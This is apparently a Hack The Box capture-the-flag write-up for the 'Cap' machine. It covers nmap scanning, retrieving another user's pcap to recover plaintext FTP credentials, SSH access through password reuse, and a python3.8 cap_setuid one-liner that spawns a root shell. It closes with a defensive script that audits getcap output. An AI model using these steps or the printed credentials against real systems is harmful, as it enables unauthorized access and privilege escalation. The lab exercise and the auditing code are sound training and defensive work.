Cap
Cap is an easy machine from Hack The Box.
Enumeration
nmap -sC -sV -oG nmap_basic_oG 10.10.10.245
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
FTP, SSH, and HTTP. I’ll take a look at the webpage first.
It looks like a simple security dashboard.
Looking at the side menu, there are a few different tools to use. The PCAP generator seems interesting.
After running the PCAP generator, it assigns it the filename 1.pcap and lets me download it. I wonder if there’s a 0.pcap…
There is! Let’s download that and open it in Wireshark.
There are a few different data streams to look into, but the most revealing is an FTP login attempt. I can see a user, nathan, logging in to the FTP service and his password.
nathan:Buck3tH4TF0RM3!
So now I have credentials, let’s try them on the open SSH service.
Looks like a case of password reuse and now I’ve got a shell.
Privilege Escalation
After running linpeas to enumerate possible vectors for privilege escalation, I find some information about Linux capabilities.
Capabilities are a more granular way of assigning different privileges to certain processes or files. You can enumerate them with getcap -r / 2>/dev/null.
In this case, the python3.8 binary has been assigned the SUID capability, which means I can run it as the file’s owner.
The root user is the owner of this binary, so privilege escalation should be trivial.
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
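From the defender's side, the same getcap -r output can be audited for file capabilities that amount to root, such as cap_setuid on a script interpreter. The following is an added example, not part of the original write-up: the capability list, the interpreter pattern and the sample lines are assumptions made for illustration, and it accepts the getcap layouts printed by both older and newer libcap releases.

```python
import os
import re

# Capabilities that are effectively root when granted to a general-purpose
# binary. Illustrative subset chosen for this example, not an exhaustive list.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
    "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
}
# Script interpreters run arbitrary code, so a capability on one is usable
# by every user who can execute it.
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|lua)[\d.]*$")

# Matches both getcap layouts: "path = caps+flags" (older libcap) and
# "path caps=flags" (newer libcap). An empty capability list ("=ep") means all.
LINE = re.compile(r"^(?P<path>.+?)\s+(?:=\s+)?(?P<clauses>(?:[a-z0-9_,]*[+=][eip]+\s*)+)$")
CLAUSE = re.compile(r"([a-z0-9_,]*)[+=]([eip]+)")


def audit_getcap(output):
    """Return (path, sorted risky caps, is_interpreter) for each risky file."""
    findings = []
    for raw in output.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # blank line or error text
        risky = set()
        for caps, flags in CLAUSE.findall(m["clauses"]):
            if "p" not in flags:
                continue  # inheritable-only: not granted to an ordinary caller
            names = set(caps.split(",")) if caps else {"all"}
            risky |= names & (ROOT_EQUIVALENT | {"all"})
        if risky:
            name = os.path.basename(m["path"])
            findings.append((m["path"], sorted(risky), bool(INTERPRETERS.match(name))))
    return findings


# Constructed sample input (not output captured from the machine in this write-up).
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping cap_net_raw=ep
/opt/tool/helper =ep
/usr/bin/perl cap_setuid=i
"""

if __name__ == "__main__":
    for path, caps, interp in audit_getcap(SAMPLE):
        print(f"{'CRITICAL' if interp else 'HIGH'}  {path}  {','.join(caps)}")
```

A flagged capability can be cleared with setcap -r on the file once it is confirmed the binary does not need it.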